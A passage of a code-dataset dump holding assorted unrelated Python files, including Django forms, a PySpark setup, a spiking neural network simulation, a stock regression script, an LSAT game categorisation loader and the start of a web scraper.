A list of address.\n contacts: A list of contacts.\n comments: A list of comments.\n\n \"\"\"\n def __init__(self):\n self.person_id = None\n self.first_name = None\n self.last_name = None\n self.middle_initial = None\n self.nick_name = None\n self.date_of_birth = None\n self.date_of_death = None\n self.relatives = []\n self.identities = []\n self.addresses = []\n self.contacts = []\n self.comments = []\n\n\nclass Relationship(object):\n \"\"\"\n\n A person relationship.\n\n Attributes:\n\n person_id: The person identifier for which this relationship is assigned.\n related_person_id: The person identifier for which this person is related.\n relationship_type: The type of relationship between two people as designated by the assigned relationship.\n relationship_id: The identifier for the relationship (a row identifier)\n relationship_type_description: The description of the relationship type.\n related_person_relationship_type: The related person's relationship type.\n person = Person(). Inherited from Person\n\n \"\"\"\n\n def __init__(self):\n self.person_id = None\n self.related_person_id = None\n self.relationship_type = None\n self.relationship_id = None\n self.relationship_type_description = None\n self.related_person_relationship_type = None\n self.person = Person() # TODO: reactor Relationship and Relatiohship2 into a properly inherited class\n\n\nclass Relationship2(Person):\n \"\"\"\n\n A person relationship.\n\n Attributes:\n\n person_id: The person identifier for which this relationship is assigned.\n related_person_id: The person identifier for which this person is related.\n relationship_type: The type of relationship between two people as designated by the assigned relationship.\n relationship_id: The identifier for the relationship (a row identifier)\n relationship_type_description: The description of the relationship type.\n related_person_relationship_type: The related person's relationship type.\n person = Person(). Inherited from Person\n\n \"\"\"\n\n def __init__(self):\n self.person_id = None\n self.related_person_id = None\n self.relationship_type = None\n self.relationship_id = None\n self.relationship_type_description = None\n self.related_person_relationship_type = None\n\n\nclass Comment(object):\n \"\"\"\n\n Person comment class.\n\n Attributes:\n person_id: Person identifier for which the comment belongs.\n comment: Comment content.\n comment_id: Comment identifier (row identifier)\n\n \"\"\"\n def __init__(self):\n self.person_id = None\n self.comment = None\n self.comment_id = None\n","sub_path":"addressbook/models/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"488359991","text":"x=input(\"enter the string to check\")\r\nlen=0\r\nrev=\"\"\r\nfor i in x:\r\n len=len+1\r\nwhile len>0:\r\n rev+=x[len-1]\r\n len=len-1\r\nif x==rev:\r\n print(\"its a palindrome\")\r\nelse:\r\n print(\"its not a palindrome\")\r\n","sub_path":"palindrome or not.py","file_name":"palindrome or not.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"452059361","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nfrom unittest import TestCase\n\nfrom tests.utils import assert_equal_layers\n\nfrom polyaxon_schemas.ml.initializations import (\n GlorotUniformInitializerConfig,\n ZerosInitializerConfig\n)\nfrom polyaxon_schemas.ml.layers.local import LocallyConnected1DConfig, LocallyConnected2DConfig\n\n\nclass TestLocalConfigs(TestCase):\n @staticmethod\n def assert_local_config(local_class, dim):\n config_dict = {\n 'filters': 20,\n 'kernel_size': 3,\n 'strides': 1 if dim == 1 else [1, 1],\n 'padding': 'valid',\n 'data_format': None,\n 'activation': None,\n 'use_bias': True,\n 'kernel_initializer': GlorotUniformInitializerConfig().to_schema(),\n 'bias_initializer': ZerosInitializerConfig().to_schema(),\n 'kernel_regularizer': None,\n 'bias_regularizer': None,\n 'activity_regularizer': None,\n 'kernel_constraint': None,\n 'bias_constraint': None,\n }\n if dim > 1:\n config_dict['data_format'] = None\n config = local_class.from_dict(config_dict)\n assert_equal_layers(config, config_dict)\n\n def test_local_config(self):\n self.assert_local_config(LocallyConnected1DConfig, 1)\n self.assert_local_config(LocallyConnected2DConfig, 2)\n","sub_path":"tests/test_ml/test_layers/test_local.py","file_name":"test_local.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"291563454","text":"from cloudinary.forms import CloudinaryFileField\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.forms import CheckboxInput, EmailInput, ModelForm, NumberInput, \\\n Select, TextInput\nfrom django.forms.utils import ErrorList\n\nfrom .models import Collection, Manga\n\n\nclass SignUpForm(UserCreationForm):\n email = forms.EmailField(max_length=254, help_text='Requis. Saisissez une adresse email valide.')\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']\n widgets = {\n 'username': TextInput(attrs={'class': 'form-control'}),\n 'email': EmailInput(attrs={'class': 'form-control'}),\n 'password1': TextInput(attrs={'class': 'form-control'}),\n 'password2': TextInput(attrs={'class': 'form-control'})\n }\n\n\nclass DivErrorList(ErrorList):\n def __str__(self):\n return self.as_divs()\n\n def as_divs(self):\n if not self:\n return ''\n return '
%s
' % ''.join(['

%s

' % e for e in self])\n\n\nclass CollectionForm(ModelForm):\n def __init__(self, *args, **kwargs):\n\n user_collection = Collection.objects.filter(owner=kwargs.pop('owner'))\n\n super(CollectionForm, self).__init__(*args, **kwargs)\n self.fields['manga'].queryset = Manga.objects.exclude(\n pk__in=[collection.manga.pk for collection in user_collection]\n )\n\n class Meta:\n model = Collection\n fields = ['manga', 'owned_volumes']\n widgets = {\n 'manga': Select(attrs={'class': 'form-control'}),\n 'owned_volumes': NumberInput(attrs={'class': 'form-control'})\n }\n\n\nclass CollectionUpdateForm(ModelForm):\n class Meta:\n model = Collection\n fields = ['owned_volumes']\n widgets = {\n 'owned_volumes': NumberInput(attrs={'class': 'form-control'})\n }\n\n\nclass MangaForm(ModelForm):\n class Meta:\n model = Manga\n fields = ['title', 'cover', 'synopsis', 'total_volumes', 'is_finished']\n widgets = {\n 'title': TextInput(attrs={'class': 'form-control'}),\n 'total_volumes': NumberInput(attrs={'class': 'form-control'}),\n 'is_finished': CheckboxInput(attrs={'class': 'form-control'})\n }\n\n cover = CloudinaryFileField(\n options={\n 'crop': 'scale',\n 'folder': 'mangas',\n 'format': 'jpg',\n 'height': 360,\n 'tags': 'manga_cover',\n 'width': 250,\n }\n )\n","sub_path":"collection/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"247023612","text":"\n\n#calss header\nclass _SOMBRE():\n\tdef __init__(self,): \n\t\tself.name = \"SOMBRE\"\n\t\tself.definitions = [u'serious, sad, and without humour or entertainment: ', u'dark and plain: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_sombre.py","file_name":"_sombre.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"591772935","text":"# Copyright (C) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See LICENSE in project root for information.\n\nfrom pyspark.sql import SparkSession, SQLContext\nimport os\n\nspark = SparkSession.builder \\\n .master(\"local[*]\") \\\n .appName(\"PysparkTests\") \\\n .config(\"spark.jars.packages\", \"com.microsoft.ml.spark:mmlspark_2.11:\" + os.environ[\"MML_VERSION\"]) \\\n .config(\"spark.executor.heartbeatInterval\", \"60s\") \\\n .config(\"spark.sql.shuffle.partitions\", 10) \\\n .config(\"spark.sql.crossJoin.enabled\", \"true\") \\\n .getOrCreate()\n\nsc = SQLContext(spark.sparkContext)\n","sub_path":"src/test/python/mmlsparktest/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"236926838","text":"A = int(input(\"Enter a number\"))\narr = []\nfor i in range(1,A+1):\n count = 0\n for j in range(1,i+1):\n if i%j == 0:\n count=count+1\n if count==2:\n print(i)\n arr.append(i)\nprint(arr)\nprint(sum(arr))","sub_path":"python_basics_01.py/Sum_of_prime_nums.py","file_name":"Sum_of_prime_nums.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"589521888","text":"# -*- coding: iso-8859-1 -*-\n#\n# $Id: mako_utils.py,v 1.12 2012/08/08 07:21:15 xantgui Exp $\n#\n# Copyright (c) Ericsson Espaņa S.A., 2011.\n# All rights reserved.\n#\n# This product or document is proprietary to and embodies the\n# confidential technology of Ericsson Espaņa S.A.\n# Possession, use, duplication or distribution of this product\n# or document is authorized only pursuant to a valid written\n# license from Ericsson Espaņa S.A\n#\n\n\"\"\"\nThis files contains function used inside the mako's\n\"\"\"\nimport yaml\nfrom NSTpyfw.utils.execution_mode import ExecutionMode\nfrom NSTpyfw.utils.exception.framework import NoInformationAboutTheNode, InvalidOption\n\ndef get_mako_release(dist_info, execution_mode):\n \"\"\"\n Function used to retrieve the correct mako file that is needed for a specific\n SASN version and execution mode\n @param dist_info: Information of the distribuition of SASN\n @param execution_mode: Execution mode of the current execution\n @return: Name of the mako file\n \"\"\"\n if dist_info is None:\n raise NoInformationAboutTheNode()\n ## End If\n release_config = yaml.load(file(\"/opt/nstest/config/mako-release-config.yml\"))\n version = dist_info.get_distribution_module_info(\"SASN\").version\n\n if ExecutionMode().get_is_ssr(execution_mode):\n if ExecutionMode().get_execution_mode(execution_mode) in [\"hl\", \"ssr_hl\"]:\n actual_config = release_config[\"hl\"][\"ssr\"]\n elif \"ipos\" == execution_mode:\n actual_config = release_config[\"ipos\"][\"ssr\"]\n else:\n actual_config = release_config[\"com\"][\"ssr\"]\n version = dist_info.get_distribution_module_info(\"SSR\").version\n ## End If\n elif ExecutionMode().get_is_vsasn(execution_mode):\n if \"hl\" == ExecutionMode().get_execution_mode(execution_mode):\n actual_config = release_config[\"hl\"][\"vsasn\"]\n else:\n actual_config = release_config[\"com\"][\"vsasn\"]\n ## End If\n else:\n actual_config = release_config[\"hl\"][\"oracle\"]\n ## End If\n\n return actual_config.get(version, actual_config[\"default\"])\n## END METHOD get_mako_release()\n\ndef get_mako_minconfig(dist_info, execution_mode):\n \"\"\"\n Function used to retrieve the correct mako minimum config file that is needed\n for a specific SASN version and execution mode\n @param dist_info: Information of the distribuition of SASN\n @param execution_mode: Execution mode of the current execution\n @return: Name of the mako file\n \"\"\"\n if dist_info is None:\n raise NoInformationAboutTheNode()\n ## End If\n\n if ExecutionMode().get_is_ssr(execution_mode):\n actual_config = \"gi-com-minconfig-13-2.mako\"\n else:\n raise InvalidOption(\"execution_mode\", execution_mode)\n ## End If\n\n return actual_config\n## END METHOD get_mako_minconfig()\n","sub_path":"sds/back_test/ref/utils/mako_helper.py","file_name":"mako_helper.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"258427697","text":"import pandas as pd\n\ndef load(file):\n '''\n loads game categorizations and returns a array\n ready for conversion into a pandas DataFrame\n '''\n\n array = []\n with open(file) as f:\n line = f.readline().strip()\n while line:\n month, year, published_as = line.strip().split(' ', 2)\n flag = published_as.find('PrepTest')\n if flag > 0:\n _, test_num = published_as.rsplit(' ', 1)\n test_num = int(test_num[:-1])\n else:\n test_num = 0\n for game_num in range(1, 5): # index games from 1 to 4\n _, _, game_attr = f.readline().strip().split(' ', 2)\n game_attr = game_attr.split(', ') # yields a list of varying length\n game_type = game_attr[0].split(': ')\n if len(game_type) == 1:\n game_type += [''] + [''] # fill missing entries\n elif len(game_type) == 2:\n game_type += [''] # fill missing entries\n game_id = [month, year, published_as[1:-1], test_num, game_num]\n # drop parentheses around publication info\n own_col = ['missing'] # for ownership fill with default value\n all_cols = game_id + game_type + own_col + game_attr[1:]\n array.append(all_cols)\n line = f.readline().strip()\n return array\n\ndef read_prompts():\n names = ['Book_One_prompts.txt', 'Vol_V_prompts.txt', 'New_Actual.txt', '10_Actual.txt']\n for name in names:\n type = 'error'\n print (name)\n with open('../data/' + name) as f:\n line = f.readline().strip()\n while line != '--END--':\n #print (line)\n if line[:4]==\"####\":\n contents = line.split(' ')\n _, *type, _ = contents\n line = f.readline().strip()\n if line[:3]==\"###\":\n contents = line.split(' ')\n # print ('lenth of line 2', len(contents))\n _, month, year, _, game_num, _ = contents\n #line = f.readline().strip()\n # print\n #print (name, *type, 'mo', month, 'yr', year, 'game', game_num)\n line = f.readline().strip()\n prompt = []\n while line[:2]!='##':\n prompt.append(line)\n line = f.readline().strip()\n #print (\"prompt line\", line)\n #line = f.readline() # eat spacer\n rule_list = []\n line = f.readline().strip()\n while line[:2]!='##' and line!='--END--':\n rule_list.append(line)\n line = f.readline().strip()\n #print (\"rule line\", line)\n # print (name, *type, 'mo', month, 'yr', year, 'game', game_num)\n # print (\"PROMPT:\")\n # print (prompt)\n # print (\"rules:\")\n # print (rule_list)\n # print (month, year, int(game_num))\n subset = df[df.year==year]\n subset = subset[subset.month==month]\n subset = subset[subset.game_num==int(game_num)] #(df.game_num==int(game_num))]\n #print (month, year, int(game_num))\n try:\n idx = subset.index.tolist()[0]\n prompts[idx] = prompt\n rules[idx] = rule_list\n except:\n print (\"error: missing\", month, year, int(game_num))\n\ndef get_owned(df):\n df.loc[df.test_num.isin(range(1, 21)), 'own'] = 'Book One'\n df.loc[df.test_num.isin(range(21, 41)), 'own'] = 'Book Two' # missing PrepTest 41\n df.loc[df.test_num.isin(range(42, 52)), 'own'] = '10 Actual'\n df.loc[df.test_num.isin(range(52, 62)), 'own'] = '10 New Actual'\n df.loc[df.test_num.isin(range(62, 72)), 'own'] = 'Vol V'\n df.loc[(df.month == 'June') & (df.year == '2007'), 'own'] = 'Free'\n return df[df.own != 'missing']\n\ndef get_counts(input, col_names):\n type_counts = input.groupby('primary_type').count().secondary_type.to_frame(col_names[0])\n type_counts[col_names[1]] = type_counts[col_names[0]] * 100/ len(input)\n return type_counts\n\ndef save_pickle(file, name):\n with open(\"classification_data/\" + name + \".pkl\", 'w') as f:\n pickle.dump(file, f)\n print (\"done pickling \", name)\n\ndef load_pickle(name):\n '''\n returns unpickled file\n '''\n with open(\"classification_data/\" + name + \".pkl\") as f_un:\n file_unpickled = pickle.load(f_un)\n print (\"done unpickling \", name)\n return file_unpickled\n\nif __name__ == '__main__':\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.width', 300)\n\n file = 'Games_Classifications.txt'\n cols = ['month', 'year', 'published_as', 'test_num', 'game_num', 'primary_type', \\\n 'secondary_type', 'tertiary_type', 'own', 'notes1', 'notes2', 'notes3']\n array = load(file)\n\n df = pd.DataFrame(array, columns=cols)\n df.index = df.index + 1 # since game_num starts at 1, test_num should too\n #df['indices'] = df.index\n # for convenience create various subsets of the df:\n df_owned = get_owned(df) # games I own ~ training data\n bible_games = df[df.values == 'Bible'] # games dissected in PowerScore's Bible\n tests_inventory = df.groupby('own').count() # inventory of where owned games reside\n total_type_counts = get_counts(df, ['total_counts', 'percent_overall'])\n owned_type_counts = get_counts(df_owned, ['owned_counts', 'percent_of_owned'])\n combined_type_counts = pd.concat([total_type_counts,owned_type_counts], axis=1)\n combined_type_counts['held_out'] = combined_type_counts['total_counts']- \\\n combined_type_counts['owned_counts']\n combined_type_counts['percent_held'] = combined_type_counts['held_out'] * 100/ \\\n combined_type_counts['total_counts']\n\n all_seq_games = df[df.primary_type=='Pure Sequencing']\n seq_games_owned = all_seq_games[all_seq_games.own != 'missing']\n print (\"Total sequencing games:\", len(all_seq_games))\n print (\"Owned sequencing games:\", len(seq_games_owned))\n\n prompts = [[] for i in range(df.shape[0])]\n rules = [[] for i in range(df.shape[0])]\n #print ('init as', prompts)\n read_prompts()\n df.game_num[9]=2 # manual correction of wierd error\n df.game_num[35]=1 # manual correction of wierd error\n df.primary_type[9]='Basic Linear' # manual correction of wierd error\n df.primary_type[35]='Basic Linear' # manual correction of wierd error\n counter = 0\n df['keyed_pr'] = False\n for i, p in enumerate(prompts):\n if len(p)>0:\n counter += 1\n print (counter, df.index[i], df.year[i], df.month[i], df.primary_type[i], df.own[i])\n df.keyed_pr[i] = True\n keyed = df[df.keyed_pr] # subset = those with prompts and rules keyed in\n\n print (\"Total sequencing games:\", len(all_seq_games))\n print (\"Owned sequencing games:\", len(seq_games_owned))\n print (df[(df.own=='10 Actual') & (df.primary_type=='Pure Sequencing')])\n '''\n total_counts percent_overall owned_counts percent_of_owned held_out percent_held\nAdvanced Linear 85 23.876404 71.0 25.000000 14.0 16.470588\nBasic Linear 79 22.191011 67.0 23.591549 12.0 15.189873\nCircular Linearity 5 1.404494 2.0 0.704225 3.0 60.000000\nGrouping 122 34.269663 97.0 34.154930 25.0 20.491803\nGrouping/Linear Combination 21 5.898876 16.0 5.633803 5.0 23.809524\nLinear/Grouping Combination 2 0.561798 NaN NaN NaN NaN\nLinear/Mapping Combination 1 0.280899 NaN NaN NaN NaN\nMapping 1 0.280899 1.0 0.352113 0.0 0.000000\nMapping-Spatial Relations 2 0.561798 2.0 0.704225 0.0 0.000000\nMapping-Supplied Diagram 3 0.842697 3.0 1.056338 0.0 0.000000\nPattern 12 3.370787 8.0 2.816901 4.0 33.333333\nPure Sequencing 23 6.460674 17.0 5.985915 6.0 26.086957\n\n\n2 6 1991 October Pure Sequencing Book One\n3 7 1991 October Basic Linear Book One\n4 10 1991 December Basic Linear Book One\n5 11 1991 December Basic Linear Book One\n6 13 1991 December Grouping Book One\n7 14 1992 February Pure Sequencing Book One\n8 15 1992 February Grouping Book One\n9 18 1992 June Basic Linear Book One\n10 19 1992 June Grouping Book One\n11 20 1992 June Grouping Book One\n12 23 1992 October Pure Sequencing Book One\n13 26 1992 December Grouping Book One\n14 29 1992 December Grouping Book One\n15 30 1993 February Basic Linear Book One\n16 34 1993 June Basic Linear Book One\n17 36 1993 June Basic Linear Book One\n18 39 1993 October Grouping Book One\n19 42 1994 February Pure Sequencing Book One\n20 46 1994 June Grouping Book One\n21 48 1994 June Grouping Book One\n22 51 1994 October Grouping Book One\n23 52 1994 October Grouping Book One\n24 54 1994 December Grouping Book One\n25 55 1994 December Basic Linear Book One\n26 58 1995 February Grouping Book One\n27 62 1995 June Basic Linear Book One\n28 65 1995 June Grouping Book One\n29 66 1995 September Grouping Book One\n30 70 1995 December Basic Linear Book One\n31 71 1995 December Grouping Book One\n32 78 1996 June Basic Linear Book One\n33 80 1996 June Grouping Book One\n34 81 1996 June Grouping Book One\n35 187 2004 June Pure Sequencing 10 Actual\n36 207 2005 December Pure Sequencing 10 Actual\n37 217 2006 September Pure Sequencing 10 Actual\n38 221 2006 December Pure Sequencing 10 Actual\n39 229 2007 September Pure Sequencing 10 New Actual\n40 231 2007 December Pure Sequencing 10 New Actual\n41 240 2008 October Pure Sequencing 10 New Actual\n42 263 2010 October Pure Sequencing 10 New Actual\n43 266 2010 December Basic Linear Vol V\n44 269 2010 December Basic Linear Vol V\n45 271 2011 June Basic Linear Vol V\n46 272 2011 June Basic Linear Vol V\n47 273 2011 June Basic Linear Vol V\n48 274 2011 October Basic Linear Vol V\n49 278 2011 December Basic Linear Vol V\n50 281 2011 December Basic Linear Vol V\n51 283 2012 June Basic Linear Vol V\n52 287 2012 October Basic Linear Vol V\n53 294 2013 June Basic Linear Vol V\n54 298 2013 October Basic Linear Vol V\n55 302 2013 December Pure Sequencing Vol V\n56 305 2013 December Basic Linear Vol V\n\n\nKEYED month year published_as test_num game_num secondary_type tertiary_type own notes1 notes2 notes3 keyed_pr\nprimary_type\nBasic Linear 24 24 24 24 24 24 24 24 8 0 0 24\nGrouping 18 18 18 18 18 18 18 18 15 3 0 18\nPure Sequencing 14 14 14 14 14 14 14 14 2 0 0 14\n'''\n","sub_path":"load_categories_df.py","file_name":"load_categories_df.py","file_ext":"py","file_size_in_byte":11619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"315131068","text":"#!/srv/conda/envs/notebook/bin/python\n\nimport sys\nfin_name = sys.argv[1]\n\nsum = 0\ncn = 0\nfor line in open(fin_name):\n sum += float(line)\n cn += 1\n\nif cn > 0:\n print(sum/cn)","sub_path":"zapiski/2022-05-17 ukazna/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"319343081","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os, subprocess\nimport PrintNNinfo as out\nfrom time import time\nimport pickle as pkl\n\n\ndef CreateERnetwork(cell_types, ps):\n n = len(ps)\n syn_types = np.arange(n*n).reshape(n, n)\n cnt_map = np.ones([len(cell_types), len(cell_types)], dtype=int) * (-1)\n \n for i, cpre in enumerate(cell_types):\n for j, cpost in enumerate(cell_types):\n if i != j:\n if np.random.uniform() < ps[cpre][cpost]:\n cnt_map[i][j] = syn_types[cpre][cpost]\n return cnt_map\n\n\ndef get_Poisson_t(f, N, tmax, dt, t0=0):\n prob = f*dt\n times = np.arange(t0, tmax, dt)\n ts = []\n for i in range(N):\n rand = np.random.uniform(low=0, high=1e3, size=len(times))\n ids = rand < prob\n ts.append(times[ids])\n return ts\n\n\ndef set_ext_types(target_ids, n_ext_exc, cell_types, ext_syn_types):\n n_ext_inh = len(target_ids) - n_ext_exc\n# ext_syn_types = [[0, 1], [2, 3]] # ext_PN -> ? / ext_Inh -> ?\n ext_types = []\n for i, tid in enumerate(target_ids):\n ext_types.append([])\n if i < n_ext_exc:\n pre = 0\n else:\n pre = 1\n for n in tid:\n ext_types[-1].append(ext_syn_types[pre][cell_types[n]])\n return ext_types\n\n\ndef read_all(prefix):\n t, v = out.readOut(prefix+'_v.csv')\n _, ii = out.readOut(prefix+'_i.csv')\n tspks = []\n for i in range(v.shape[1]):\n tspks.append(t[v[:, i] == 30])\n return t, v, ii, tspks\n\n\ndef merge_lists(a1, a2):\n arrs = []\n for a in a1:\n arrs.append(a)\n for a in a2:\n arrs.append(a)\n return arrs\n\n\ndef auto_corr(x, tmax, srate, ind=None):\n if ind is not None:\n x = x[ind]\n kmax = int(tmax * srate)\n corr = []\n ks = np.arange(0, kmax+0.1, 1) / srate\n xm = np.average(x)\n for k in range(kmax+1):\n if k == 0:\n x1 = x\n x2 = x\n else: # k > 0\n x1 = x[:-k]\n x2 = x[k:]\n s1 = np.std(x1)\n s2 = np.std(x2)\n if ((s1==0) or (s2==0)):\n corr.append(0)\n else:\n corr.append(np.sum((x1-xm)*(x2-xm))/len(x)/(np.std(x1)*np.std(x2)))\n return ks, corr\n\ndef get_sync_index(vall, ind=None):\n # vall (:, n_cells)\n if ind is None:\n ind = np.ones(vall.shape[0], dtype=bool)\n \n v_avg = np.average(vall, axis=1)\n s_all = np.std(v_avg[ind])**2\n s_cell = np.std(vall[ind, :], axis=0)\n \n numer = np.average(s_all)\n denom = np.average(s_cell**2)\n \n return numer/denom\n\ndef runSimulation(info):\n\n tic = time()\n seed = info['seed']\n\n np.random.seed(seed)\n\n # set parameters\n tmax = 200\n dt = 0.01\n\n n_exc = 100\n n_inh = 25\n\n n_stims_pos = 125\n p_stims_pos = [0.2, 0.2]\n\n # Poisson input\n f_pos = info['f']\n\n out_prefix = 'out%d'%(info['id'])\n fname = 'id_%04d_f_%03d_ext_%2d-5_seed_%d'%(info['id'], info['f'], info['gmax'], seed)\n\n # set PN cell type & cells parameter\n params_pn = {'tau':20, 'r':500, 'e':-70, 'vahp':-80, 'vth':-40, 't_refrac':5, 'v0':-65, 'vmax':30}\n params_pv = {'tau':2, 'r':500, 'e':-70, 'vahp':-80, 'vth':-40, 't_refrac':0.2, 'v0':-65, 'vmax':30}\n\n # set synapse type & parameter\n syn_pn2pn = {'gmax':1e-3, 'tau_r':0.2, 'tau_d':4.6, 'e':0, 'd':1}\n syn_pn2pv = {'gmax':1e-4, 'tau_r':0.1, 'tau_d':1.3, 'e':0, 'd':1}\n syn_pv2pn = {'gmax':1e-2, 'tau_r':0.5, 'tau_d':7.6, 'e':-80, 'd':1}\n syn_pv2pv = {'gmax':1e-3, 'tau_r':0.5, 'tau_d':7.6, 'e':-80, 'd':1}\n syn_type_params = [syn_pn2pn, syn_pn2pv, syn_pv2pn, syn_pv2pv]\n\n # set network parameters\n ps = [[0.2, 0.2], [0.3, 0.3]] # PN->PN/Inh, Inh->PN/Inh\n\n # background input\n ext_pn2pn = {'gmax':info['gmax']*1e-5, 'tau_r':0.2, 'tau_d':4.6, 'e':0, 'd':0}\n ext_pn2pv = {'gmax':info['gmax']*1e-5, 'tau_r':0.1, 'tau_d':1.3, 'e':0, 'd':0}\n\n ext_syn_type_params = [ext_pn2pn, ext_pn2pv]\n\n # create network\n n_cells = n_exc + n_inh\n cell_types = []\n for i in range(n_cells):\n if i < n_exc:\n cell_types.append(0)\n else:\n cell_types.append(1)\n cnt_map = CreateERnetwork(cell_types, ps)\n\n # get ids\n ids_targets = []\n for i in range(n_stims_pos):\n ids_targets.append([])\n for j in range(n_cells):\n c = cell_types[j]\n p = np.random.uniform(low=0, high=1)\n if p < p_stims_pos[c]:\n ids_targets[i].append(j)\n\n # external types\n ext_types = []\n for i in range(n_stims_pos):\n ext_types.append([])\n for ind in ids_targets[i]:\n c = cell_types[ind]\n ext_types[i].append(c)\n\n t_stims = get_Poisson_t(f_pos, n_cells, tmax, dt, t0=0)\n\n\n out.print_nn_params('./parameter/', out_prefix, cell_types, cnt_map, [params_pn, params_pv], syn_type_params,\n ids_targets, ext_types, t_stims, ext_syn_type_params, overwrite=True, ischeck=False,\n d_noise=0.3, g_noise_syn=1e-5, g_noise_ext=0)\n \n subprocess.call(['./runNetwork_w_no_print',\n '--fdir', './parameter/', '--prefix', out_prefix, '--fsave', f'./vcells_{out_prefix}', '--tmax', '%d'%(tmax),\n '--dt', '0.01', '--s', '0.2', '--seed', '%d'%(seed)])\n\n times, vall, iall, tspks = read_all(f'./vcells_{out_prefix}')\n\n si = get_sync_index(vall)\n\n with open('./result_ch/data/'+fname+'.pkl', 'wb') as f:\n pkl.dump(vall, f)\n pkl.dump(times, f)\n\n pkl.dump(tspks, f)\n pkl.dump(si, f)\n \n os.remove(f'./parameter/{out_prefix}_info.csv')\n os.remove(f'./parameter/{out_prefix}_cell.csv')\n os.remove(f'./parameter/{out_prefix}_syn.csv')\n os.remove(f'./parameter/{out_prefix}_t_spike.csv')\n\n os.remove(f'./vcells_{out_prefix}_v.csv')\n os.remove(f'./vcells_{out_prefix}_i.csv')\n\n print('%d Done, t=%.3fs'%(info['id'], time()-tic))\n\n return\n\n\nif __name__ == '__main__':\n\n import multiprocessing\n\n plt.ioff()\n\n f_range = np.linspace(1, 201, 20)\n gmax_range = np.linspace(5, 50, 20) #x1e-5\n n_mc = 5\n seeds = np.random.randint(10, 100000, n_mc)\n np.save('./result_ch/seed.npy', seeds)\n\n infos = []\n n = 0\n for seed in seeds:\n for f in f_range:\n for g in gmax_range:\n infos.append({'id':n, 'f':f, 'gmax':g, 'seed':seed})\n n += 1\n\n pool = multiprocessing.Pool(processes=18)\n\n tic = time()\n pool.map(runSimulation, infos)\n pool.close()\n pool.join()\n\n print('Execution Done, %.5fs'%(time()-tic))\n\n\n \n \n \n\n \n \n \n\n ","sub_path":"LIFnetwork_ver_C/runNetwork_character.py","file_name":"runNetwork_character.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"59130173","text":"# coding=utf-8\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\n# ai_stock_1:重回帰分析による株価予測\n\n\ndef make_data(y):\n seq_len = 1\n y_data = []\n for i in range(len(y) - seq_len):\n y_data.append(y[i + seq_len])\n\n return y_data\n\n\n# get Data\ncsv_data = pd.read_csv('data/test_data.csv')\nx = csv_data.drop(['Date'], axis=1).values\ny = csv_data['^GSPC'].values.reshape(-1, 1)\n# Normalize the numerical values\nxScaler = StandardScaler()\nyScaler = StandardScaler()\nx = xScaler.fit_transform(x)\ny = yScaler.fit_transform(y)\nx = np.array(x[:-1])\ny = np.array(make_data(y))\n# split the data to train and test\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n# make model\nmodel = LinearRegression()\nmodel.fit(x_train, y_train)\n# make prediction\ny_pred = model.predict(x_test)\nprint(\"Test score:\", r2_score(y_test, y_pred))\n# show prediction\ny_pred = yScaler.inverse_transform(y_pred)\ny_test = yScaler.inverse_transform(y_test)\nprint (\"Pred\\n\", y_pred[:3])\nprint (\"Answ\\n\", y_test[:3])\n","sub_path":"ai_stock_1.py","file_name":"ai_stock_1.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"18085778","text":"#!/usr/bin/env python3\n\nimport os\n\ndef view_dir(path = '.'):\n \"\"\"\n 显示目标目录下的所有文件\n :param path:\n :return:\n \"\"\"\n names = os.listdir(path)\n names.sort()\n for name in names:\n print(name)\n\nprint(view_dir('/tmp'))","sub_path":"Python3/Modules/view_dir.py","file_name":"view_dir.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"473527639","text":"import bs4\nimport load_url as lurl\nimport re\nfrom multiprocessing import Pool\n# 这里输入都是load的data\ntmp = \"https://baike.baidu.com\" #拼接前缀\ndef get_relations(data):\n \"\"\"\n 解析的到relation关系\n :param data:\n :return: list\n \"\"\"\n # if data == None:\n # 